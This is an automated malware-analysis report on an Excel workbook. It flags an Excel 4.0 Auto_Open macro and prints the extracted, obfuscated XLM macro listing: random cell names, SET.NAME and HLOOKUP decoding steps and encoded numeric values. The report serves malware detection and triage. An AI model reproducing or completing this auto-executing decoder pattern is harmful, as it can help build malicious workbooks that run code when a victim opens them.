MALICIOUS (Risk Score: 140)
Heuristics (3)
- Excel 4.0 Auto_Open defined name | critical | OLE_XLM_AUTOOPEN_DEFINEDNAME: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs | critical | OLE_XLM_DANGEROUS_FN: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present | medium | OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6814 bytes |

SHA-256: 495ff330244be341c8ffc2cc938f4770901e6b2761370e00ab9e4eee2d5a23a5

First 1,000 lines of the extracted script:
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - hTAjNAWEJt
' 0018 21 LABEL : Cell Value, String Constant - AgLsTj len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B145
' 0018 27 LABEL : Cell Value, String Constant - bBLOuwvwxtdl len=0
' 0018 23 LABEL : Cell Value, String Constant - dKuWXtnI len=0
' 0018 27 LABEL : Cell Value, String Constant - DomVyTVEtPOG len=0
' 0018 23 LABEL : Cell Value, String Constant - hIIfgcdW len=0
' 0018 20 LABEL : Cell Value, String Constant - htogc len=0
' 0018 23 LABEL : Cell Value, String Constant - iZOJUdro len=0
' 0018 22 LABEL : Cell Value, String Constant - KAmQpnx len=0
' 0018 23 LABEL : Cell Value, String Constant - kHjahIPv len=0
' 0018 21 LABEL : Cell Value, String Constant - llpzsY len=0
' 0018 24 LABEL : Cell Value, String Constant - NjpmYCzVi len=0
' 0018 23 LABEL : Cell Value, String Constant - nxXMgQHv len=0
' 0018 25 LABEL : Cell Value, String Constant - oEvZqtDaWY len=0
' 0018 20 LABEL : Cell Value, String Constant - QaoiM len=0
' 0018 23 LABEL : Cell Value, String Constant - qNGtBcPj len=0
' 0018 23 LABEL : Cell Value, String Constant - sGGWBidL len=0
' 0018 26 LABEL : Cell Value, String Constant - sKhiDbNtydw len=0
' 0018 20 LABEL : Cell Value, String Constant - uAoAv len=0
' 0018 27 LABEL : Cell Value, String Constant - useqgOwjWPSI len=0
' 0018 26 LABEL : Cell Value, String Constant - XshFxksQqWw len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' hTAjNAWEJt,B49,"SET.NAME("sKhiDbNtydw",0+VALUE("0"))",""
' hTAjNAWEJt,B53,"SET.NAME("KAmQpnx",sKhiDbNtydw)",""
' hTAjNAWEJt,P54,"",-700.00000000000000000000
' hTAjNAWEJt,P55,"",-25.00000000000000000000
' hTAjNAWEJt,P56,"",82.00000000000000000000
' hTAjNAWEJt,B57,"SET.NAME("XshFxksQqWw",sKhiDbNtydw)",""
' hTAjNAWEJt,P57,"",-226.00000000000000000000
' hTAjNAWEJt,P58,"",566.00000000000000000000
' hTAjNAWEJt,P59,"",-979.00000000000000000000
' hTAjNAWEJt,B61,"SET.NAME("QaoiM",COUNTA(sGGWBidL))",""
' hTAjNAWEJt,B66,"SET.NAME("hIIfgcdW",COUNTA(nxXMgQHv))",""
' hTAjNAWEJt,B71,[],""
' hTAjNAWEJt,B74,"SET.NAME("htogc","")",""
' hTAjNAWEJt,B78,"KAmQpnx",""
' hTAjNAWEJt,B82,"SET.NAME("DomVyTVEtPOG",HLOOKUP("*",sGGWBidL,KAmQpnx,FALSE))",""
' hTAjNAWEJt,B84,"useqgOwjWPSI",""
' hTAjNAWEJt,B89,"SET.NAME("llpzsY",sKhiDbNtydw)",""
' hTAjNAWEJt,B91,[],""
' hTAjNAWEJt,B94,"llpzsY",""
' hTAjNAWEJt,B97,"bBLOuwvwxtdl",""
' hTAjNAWEJt,B100,"NjpmYCzVi",""
' hTAjNAWEJt,B104,"AgLsTj",""
' hTAjNAWEJt,B106,"SET.NAME("uAoAv",VALUE(HLOOKUP("*",nxXMgQHv,AgLsTj,FALSE)))",""
' hTAjNAWEJt,B111,"iZOJUdro",""
' hTAjNAWEJt,B114,"htogc",""
' hTAjNAWEJt,B119,"XshFxksQqWw",""
' hTAjNAWEJt,B123,NEXT(),""
' hTAjNAWEJt,B128,"oEvZqtDaWY",""
' hTAjNAWEJt,B133,[],""
' hTAjNAWEJt,B136,"qNGtBcPj",""
' hTAjNAWEJt,B138,NEXT(),""
' hTAjNAWEJt,B143,RETURN(),""
' hTAjNAWEJt,B166,"SET.NAME("kHjahIPv",B49)",""
' hTAjNAWEJt,B168,"sGGWBidL",""
' hTAjNAWEJt,B173,"SET.NAME("nxXMgQHv",R58C14)",""
' hTAjNAWEJt,B178,"SET.NAME("qNGtBcPj",184)",""
' hTAjNAWEJt,B181,"SET.NAME("dKuWXtnI",2)",""
' hTAjNAWEJt,B183,kHjahIPv(),""
' hTAjNAWEJt,B184,HALT(),""